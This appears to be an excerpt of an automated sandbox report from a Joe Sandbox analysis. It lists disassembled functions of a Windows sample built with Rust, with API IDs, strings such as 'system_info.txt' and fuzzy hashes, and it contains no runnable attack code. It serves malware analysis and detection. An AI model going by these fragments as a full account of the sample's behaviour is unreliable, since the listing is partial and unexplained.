                                            • Opcode Fuzzy Hash: c2d086761dc6fd18626da9231b532bc478a06c8ba32be5aa6bc7485a53e977e9
                                            • Instruction Fuzzy Hash: 9B618632908BC685DB609F1AE4407AAB7B0FB96B94F444235EBAD07B59CF7CD194CB10
                                            Function 00007FF7B904AFBC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 146COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_recordabort
                                            • String ID: csm$csm
                                            • API String ID: 4198837600-3733052814
                                            • Opcode ID: f8d6e8cedad6a77bb2c0396b1c190e5ae66afbc715b34cc6c0c9cebf76f4a201
                                            • Instruction ID: 6083af58740487d0c91130e0166e7df05c3df01b1c58cc9cc3ecf2ee00fd3ac1
                                            • Opcode Fuzzy Hash: f8d6e8cedad6a77bb2c0396b1c190e5ae66afbc715b34cc6c0c9cebf76f4a201
                                            • Instruction Fuzzy Hash: 5B517E3290868386EB74AE2A944426CB7B4EB66B85F944135DBAC47B99CF3CE450C710
                                            Function 00007FF7B9038BB0 Relevance: 7.8, APIs: 5, Instructions: 257COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorLast$FullNamePath
                                            • String ID:
                                            • API String ID: 2482867836-0
                                            • Opcode ID: ba76eefd639af96dec1f28aa9424d795c10072416cba78c9c45828c53f0cbe8d
                                            • Instruction ID: 8350981c3bbb0de78054f9b4ff1069f959033cd7d2a5ae4e9ab1acedf2fdd79c
                                            • Opcode Fuzzy Hash: ba76eefd639af96dec1f28aa9424d795c10072416cba78c9c45828c53f0cbe8d
                                            • Instruction Fuzzy Hash: 00B1A362A087C38AEB25AF29D9447E8A279FB16BD4F944131DF2C5B799DF38D2418310
                                            Function 00007FF7B90386B0 Relevance: 7.8, APIs: 5, Instructions: 253COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorLast$FullNamePath
                                            • String ID:
                                            • API String ID: 2482867836-0
                                            • Opcode ID: 3312637ff695d0fd956b92b6b936942761c90b43967c05ecb60f82c5b0f61ac3
                                            • Instruction ID: e40f083ad9959e52dc87d07a02d03233c6c51cedeeb1ce74ddb193bfc55da0a3
                                            • Opcode Fuzzy Hash: 3312637ff695d0fd956b92b6b936942761c90b43967c05ecb60f82c5b0f61ac3
                                            • Instruction Fuzzy Hash: 53B1B462A08BC389EB35AF29D9443E9A279FB16BD4F944131DF6C5B789DF38D2418310
                                            Function 00007FF7B9025290 Relevance: 7.7, APIs: 5, Instructions: 191COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorLast$EnvironmentVariable
                                            • String ID:
                                            • API String ID: 2691138088-0
                                            • Opcode ID: 40a8af77cb83e711465423b7e4295d1b533cfbe4621878e8606779f8fa624747
                                            • Instruction ID: a660ef722859da905a377fb276f83d932014a72c1e7dc0d18bd4bc1074bdca24
                                            • Opcode Fuzzy Hash: 40a8af77cb83e711465423b7e4295d1b533cfbe4621878e8606779f8fa624747
                                            • Instruction Fuzzy Hash: 5781B162A04AD389EB31AF29D8443E9B375FF26798F904135DF6C5B689DF38D2818314
                                            Function 00007FF7B9037D20 Relevance: 7.7, APIs: 5, Instructions: 169COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ConsoleErrorLastWrite$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 1956605914-0
                                            • Opcode ID: 9b792ba087b754caaed6a68868abe4804498491c3c59dfb27f505c1cfb20efb0
                                            • Instruction ID: ad1d1476194dbd2d1459b7951065dfd22c8f2ace4faf5fa60742bf4830d07081
                                            • Opcode Fuzzy Hash: 9b792ba087b754caaed6a68868abe4804498491c3c59dfb27f505c1cfb20efb0
                                            • Instruction Fuzzy Hash: F951D221A0C69395E720AF28E9443F9A2B1FB6A794F844131DB6D47AECDF3CD5818260
                                            Function 00007FF7B902FB70 Relevance: 7.7, APIs: 5, Instructions: 155COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorLast$FileModuleName
                                            • String ID:
                                            • API String ID: 1026760046-0
                                            • Opcode ID: f01fb9a2bc57b3d2b1039f647bb717d38f054ee20f4b73a6f2b0038690f7b895
                                            • Instruction ID: 08642594511f9229c950bd743654e8b493b2dd70b05e696a606e71a06ddf0796
                                            • Opcode Fuzzy Hash: f01fb9a2bc57b3d2b1039f647bb717d38f054ee20f4b73a6f2b0038690f7b895
                                            • Instruction Fuzzy Hash: 5F51F762A047C255E771AF29AC443E9B379BB26BE4FA04135DF2C56789DE38D2818310
                                            Function 00007FF7B9024EE0 Relevance: 7.7, APIs: 5, Instructions: 154COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorLast$CurrentDirectory
                                            • String ID:
                                            • API String ID: 3993060814-0
                                            • Opcode ID: a71a4c22c91586a61734b4bf9cdfccbd620d121b6fd3e40877aba937771e1c0d
                                            • Instruction ID: a3aaf79cd3f3add9303a6b6f494fd6be4f22c989fd65d957433336e2cca3c593
                                            • Opcode Fuzzy Hash: a71a4c22c91586a61734b4bf9cdfccbd620d121b6fd3e40877aba937771e1c0d
                                            • Instruction Fuzzy Hash: 5F51C622A047C259E771AF29AC443E9B378BB66BE4F804135DF6D5678DDE3CE2818310
                                            Function 00007FF7B9036B40 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorHandleLast$CurrentDuplicateProcess
                                            • String ID:
                                            • API String ID: 3697983210-0
                                            • Opcode ID: a84996ec7724e0f27e3750ae2423f6fd2eb7d8270aa4a0a9ba7a348fda5a6813
                                            • Instruction ID: 32cbfd78f36a897471962a98364b638bd9488602df0db523e7752b25a3101655
                                            • Opcode Fuzzy Hash: a84996ec7724e0f27e3750ae2423f6fd2eb7d8270aa4a0a9ba7a348fda5a6813
                                            • Instruction Fuzzy Hash: 59114F71A0C74396FB206F69A445379A271FB5A7A8F904234DA7D066CCDF7DE4449220
                                            Function 00007FF7B902C4F0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 267COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: AddressSingleWake
                                            • String ID: <unnamed>$Box<dyn Any>aborting due to panic at $main
                                            • API String ID: 3114109732-896199136
                                            • Opcode ID: 0026388bcf7ca5048021ae864d0e4a43bbb5f126b99ceda82b88653c6e9fc59c
                                            • Instruction ID: 7418cf91703849786189fe9bc4deb17ade6b6ae1a960a9dac50cdb16112d4be1
                                            • Opcode Fuzzy Hash: 0026388bcf7ca5048021ae864d0e4a43bbb5f126b99ceda82b88653c6e9fc59c
                                            • Instruction Fuzzy Hash: 0ED19122A08A5385EB51AF29D4403FDB7B0EB26B88F844476DB6D47798CF3DE485C360
                                            Function 00007FF7B9049D58 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 2395640692-1018135373
                                            • Opcode ID: 1073ff76e281692413ab2b7aa27f58aec6c4a35b0489a6cc94ddb9ff7625e67e
                                            • Instruction ID: 4d3a8d9c83f5cc06a3d29a91143fd9911b9628bea984415c051950abb60e1fdf
                                            • Opcode Fuzzy Hash: 1073ff76e281692413ab2b7aa27f58aec6c4a35b0489a6cc94ddb9ff7625e67e
                                            • Instruction Fuzzy Hash: FB519031A19A038ADB14AE1AE084A79B3B1EB65F88F914134DB794378EDF3DE841C710
                                            Function 00007FF7B904A0A4 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: terminate
                                            • String ID: MOC$RCC$csm
                                            • API String ID: 1821763600-2671469338
                                            • Opcode ID: 7452083ed9cb36d213407fe42873fc44bc2a82579146da1c61ef2b8bef4380e9
                                            • Instruction ID: 3ef373fa5129bf488ef9b3114d7452c33d8e80c450370d057d87253d721ce400
                                            • Opcode Fuzzy Hash: 7452083ed9cb36d213407fe42873fc44bc2a82579146da1c61ef2b8bef4380e9
                                            • Instruction Fuzzy Hash: C8F0AF36908647C6E7647F1B918106CB274EFAA740F8A9131D76C077AACF7CE490E661
                                            Function 00007FF7B90390C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: SetThreadDescription$kernel32
                                            • API String ID: 1646373207-1950310818
                                            • Opcode ID: 413311be91697036f5db5f8af35ed6315efe56a155240f357945624ab3dea04c
                                            • Instruction ID: 01b476c1fec3aeb4f49eb903fee9bbe656587dfe175d71f077addf7130e2f1d0
                                            • Opcode Fuzzy Hash: 413311be91697036f5db5f8af35ed6315efe56a155240f357945624ab3dea04c
                                            • Instruction Fuzzy Hash: 0EF05B15B0D743E1FA15AF49A9881B4B3B4AF2ABD0FC44035CA7D227589E2CE545D220
                                            Function 00007FF7B9031460 Relevance: 6.1, APIs: 4, Instructions: 103COMMON
                                            Download Yara Rule
                                            APIs
                                            • CancelIo.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,00007FF7B901F97D,?,?,00000000,00000000,?), ref: 00007FF7B9031488
                                            • GetOverlappedResult.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,00007FF7B901F97D,?,?,00000000,00000000,?), ref: 00007FF7B90314AA
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,00007FF7B901F97D,?,?,00000000,00000000,?), ref: 00007FF7B90314BC
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,?,00007FF7B901F97D,?,?,00000000,00000000,?), ref: 00007FF7B9031528
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorLast$CancelOverlappedResult
                                            • String ID:
                                            • API String ID: 3836860830-0
                                            • Opcode ID: a884bd1a06d4c2eb8e9cbb3695207d8384306ba8dfc3dcae3472e3a9cd46b628
                                            • Instruction ID: 1aa3c724db5d31050c07515e9a640dbf8c06d27ca8eb29fe72c153114c789a35
                                            • Opcode Fuzzy Hash: a884bd1a06d4c2eb8e9cbb3695207d8384306ba8dfc3dcae3472e3a9cd46b628
                                            • Instruction Fuzzy Hash: AD419F32A18A4285EB50AF69D9403AD67B0FBA9794F548631DF6E43BC8DF38D580C320
                                            Function 00007FF7B9032BA8 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorLast$DirectorySystem
                                            • String ID:
                                            • API String ID: 860285823-0
                                            • Opcode ID: eb39d9dc3ab494b94e2d1b0ffc44216c63ff8d20ddcc7591486e24af19e69c66
                                            • Instruction ID: 2b308614af54199e16c73419b11a61f9dc73978b85ef36c594e0b3c4a5929d1a
                                            • Opcode Fuzzy Hash: eb39d9dc3ab494b94e2d1b0ffc44216c63ff8d20ddcc7591486e24af19e69c66
                                            • Instruction Fuzzy Hash: EA41B721A18AA245E7746F3D8D443BAA2A1BB2AB55F904135DA6D8BBCCDF28D540D310
                                            Function 00007FF7B90310D0 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateEventW.KERNEL32(?,?,?,00000000,?,?,?,00007FF7B9030D5D), ref: 00007FF7B9031100
                                            • GetLastError.KERNEL32(?,?,?,00000000,?,?,?,00007FF7B9030D5D), ref: 00007FF7B903115D
                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,00007FF7B9030D5D), ref: 00007FF7B90311CE
                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,00007FF7B9030D5D), ref: 00007FF7B90311D4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: CloseHandle$CreateErrorEventLast
                                            • String ID:
                                            • API String ID: 3743700123-0
                                            • Opcode ID: 19626a39ad0d5ba7b181dd2f40a95146c2c1a4e072f003b6bbab82c629dff18b
                                            • Instruction ID: fbc5449187483782485d9aea1b8abc836e21755bb2ffe3f81cbdf3eeee26f2ca
                                            • Opcode Fuzzy Hash: 19626a39ad0d5ba7b181dd2f40a95146c2c1a4e072f003b6bbab82c629dff18b
                                            • Instruction Fuzzy Hash: FC21D233A04B0286F7215F26B8403A9A674FB9A7A0F588234DFAD137D4EE3CD4D28310
                                            Function 00007FF7B904904C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                            • String ID:
                                            • API String ID: 2933794660-0
                                            • Opcode ID: 43b5c4cba9f747e9d25ac04b51d92f885defc1a8dfb37f1489eaa0b42e208026
                                            • Instruction ID: 03514467bb64bed0a7110e4736e2f4782a63e83c810634e9b92db913475c0d79
                                            • Opcode Fuzzy Hash: 43b5c4cba9f747e9d25ac04b51d92f885defc1a8dfb37f1489eaa0b42e208026
                                            • Instruction Fuzzy Hash: 90111F22B14B0289EB40AF64E8542B873B4F72A758F440E35DB6D86798DF78D5548350
                                            Function 00007FF7B904E574 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 190COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs, xrefs: 00007FF7B904E8BC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: AddressWake$Single
                                            • String ID: use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs
                                            • API String ID: 1135737206-63010627
                                            • Opcode ID: 8a86cd98932279247778391f93ff708e004df7436a706d6f3d3cea724bd37281
                                            • Instruction ID: 2760b41df263073bba1abd77da33771e3879a8adf998b0218122150e7d717bee
                                            • Opcode Fuzzy Hash: 8a86cd98932279247778391f93ff708e004df7436a706d6f3d3cea724bd37281
                                            • Instruction Fuzzy Hash: D3913A21E08A4385FB11FF1CE880379A7B0AB76764F854535DB2D823A9DF2DE685D360
                                            Function 00007FF7B904EA94 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: AddressWake
                                            • String ID: system_info.txtFailed to write to file:
                                            • API String ID: 98804233-2426490079
                                            • Opcode ID: cafdba6228075f100baa5bb20edf4749aba7be72585362519b9a1f3a86e265ea
                                            • Instruction ID: cd8617f3eb8b516aee57b099c5a1dd9e0a4ec0af04c9fcba2aebf81fe3db4e6f
                                            • Opcode Fuzzy Hash: cafdba6228075f100baa5bb20edf4749aba7be72585362519b9a1f3a86e265ea
                                            • Instruction Fuzzy Hash: 69318132A0860386F721AF19F85036AB6B0FB66314F914535DB9E46794CF7DE586C3A0
                                            Function 00007FF7B90265B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72COMMON
                                            Download Yara Rule
                                            Strings
                                            • lock count overflow in reentrant mutexlibrary\std\src\sync\reentrant_lock.rs, xrefs: 00007FF7B902658C
                                            • use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs, xrefs: 00007FF7B9026574
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: AddressSingleWake
